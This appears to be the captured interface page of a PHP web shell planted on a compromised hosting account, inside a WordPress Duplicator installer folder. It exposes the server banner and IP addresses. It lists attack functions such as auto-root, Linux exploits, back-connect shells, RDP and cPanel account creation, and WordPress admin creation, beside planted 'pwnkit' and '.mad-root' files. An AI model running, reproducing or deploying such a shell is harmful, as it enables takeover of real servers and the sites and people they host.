Linux webm001.cluster111.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.111.20.1 | : 216.73.216.115
Cant Read [ /etc/named.conf ]
7.4.33
osteocoeek
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
osteocoeek /
holistea.eu /
dup-installer /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
classes
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
index.php
15
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
view.api.php
2.69
KB
-rw-r--r--
view.exception.php
1.41
KB
-rw-r--r--
view.help.php
43.57
KB
-rw-r--r--
view.init1.php
2.15
KB
-rw-r--r--
view.s1.base.php
54.53
KB
-rw-r--r--
view.s2.base.php
20.54
KB
-rw-r--r--
view.s2.basic.php
4.16
KB
-rw-r--r--
view.s2.cpnl.php
13.59
KB
-rw-r--r--
view.s2.dbtest.php
24.49
KB
-rw-r--r--
view.s3.php
14.94
KB
-rw-r--r--
view.s4.php
17.79
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : view.api.php
<?php defined("DUPXABSPATH") or die(""); ?> <!-- START OF VIEW API --> <style> div#content {width:70%} div#api-area {margin:auto; line-height:21px } div#api-area table {width:100%} div#api-area table td:first-child{width:40%; padding-right:15px} div#api-area table td{vertical-align:top; text-align:left} iframe#api-results {margin:auto; width:97%; height:90%; border:1px solid silver; min-height: 500px} div.api-details {font-size:11px} form.api-form {display:none; padding-left:20px} form.api-form input[type=text] {width:100%; font-size:12px; padding:3px} input#api-results-txt {width:97% !important; background: #efefef;} div.api-area a.operation {font-weight: bold; font-size:14px} div.api-area pre {font-size:11px; line-height: 13px; padding: 2px; border:1px solid silver; background: #efefef; border-radius: 3px} </style> <script> function RequestAPI(template, test) { var url = window.location.href; url = url.replace("/api/", ""); url = url + template; if (test == 0) { $('#api-results-txt').val(url); $('#api-results').attr('src', url); } else { window.open(url, 'api-window'); } } </script> <div id="api-area"> <div class="hdr-main"> API ROUTES: <!--div style="float:right; font-size:12px"> <input type="checkbox" name="api-debug" id="api-debug"> <label for="api-debug">Debug Routes</label> </div--> </div> <div class="api-area"> <table> <tr> <td> <b>OPERATIONS:</b> <?php foreach($API_Server->controllers as $class) : ?> <div style="padding: 5px 0 5px 0"> <?php $id = uniqid(); $name = str_replace('/api/', '', $class->operation); ?> <a href="javascript:void(0)" onclick="$('#frm-<?php echo esc_js($id);?>').toggle()" class="operation">»<?php echo esc_html($name);?></a><br/> <form id="frm-<?php echo DUPX_U::esc_attr($id);?>" class="api-form"> <input id="txt-<?php echo DUPX_U::esc_attr($id);?>" type="text" value="<?php echo DUPX_U::esc_attr($class->template);?>" /> <br/> <a href="javascript:void(0)" onclick="RequestAPI($('#txt-<?php echo DUPX_U::esc_attr($id);?>').val(), 0)">[Test]</a> <a href="javascript:void(0)" onclick="RequestAPI($('#txt-<?php echo DUPX_U::esc_attr($id);?>').val(), 1)">[New Window]</a> <div class="api-details" id="details-<?php echo DUPX_U::esc_attr($id);?>"> <?php DUPX_U::dump($class, 1); ?> </div> </form> </div> <?php endforeach; ?> </td> <td> <b>TEST RESULTS:</b> <br/> <input id="api-results-txt" type="text" readonly="true" /> <br/> <iframe id="api-results" /> </td> </tr> </table> </div> </div> <!-- END OF VIEW API -->
Close